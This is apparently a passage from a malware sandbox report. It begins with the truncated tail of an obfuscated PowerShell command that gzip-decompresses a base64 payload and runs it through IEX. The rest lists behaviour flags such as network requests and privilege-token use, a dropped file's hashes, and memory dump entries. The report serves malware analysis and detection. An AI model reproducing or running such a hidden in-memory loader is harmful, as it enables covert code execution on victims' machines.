GIhJTltfaBq0AG1d0uD8rz9smS828rMlc2krOSXvxy3ZbkslrbGMG7erS229QNf/A8WHIp/Aj/c6ip/e/cb6Ktq13DNKfrI+f/GfUvBnZPQwFeBuw33FyL6l/o6Tg8JOvkaeUgfq8Q9P+oV4n4jzJnyq/Atn6d4YmgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5KUMM2BEP9OH5GRSXPIF.temp
Filesize
7KB

MD5
2a89a9cdfae7c6a2b4825ba35dfeff68

SHA1
7620da0bd6d5d2a75b6a9e75b55e74aee23d4854

SHA256
cd6124501ac7d53b871bf40ea8edecf6c97ef061e73eb120d00fa1417e4cc2d4

SHA512
8304a10e82fe4e981178a1c56201c848e3d51c618437741a5652eb1c36765e3e69dac40ebafe67c8c3c93a36429839ad00b43c9164d892374416848c4a9c0538

Download Submit
memory/2188-14-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/2544-15-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2544-13-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/2544-12-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2544-16-0x0000000002B40000-0x0000000002B41000-memory.dmp

Filesize
4KB

Download
memory/2544-17-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2544-20-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2600-5-0x0000000002490000-0x00000000024D0000-memory.dmp

Filesize
256KB

Download
memory/2600-4-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2600-3-0x0000000002490000-0x00000000024D0000-memory.dmp

Filesize
256KB

Download
memory/2600-6-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2600-2-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads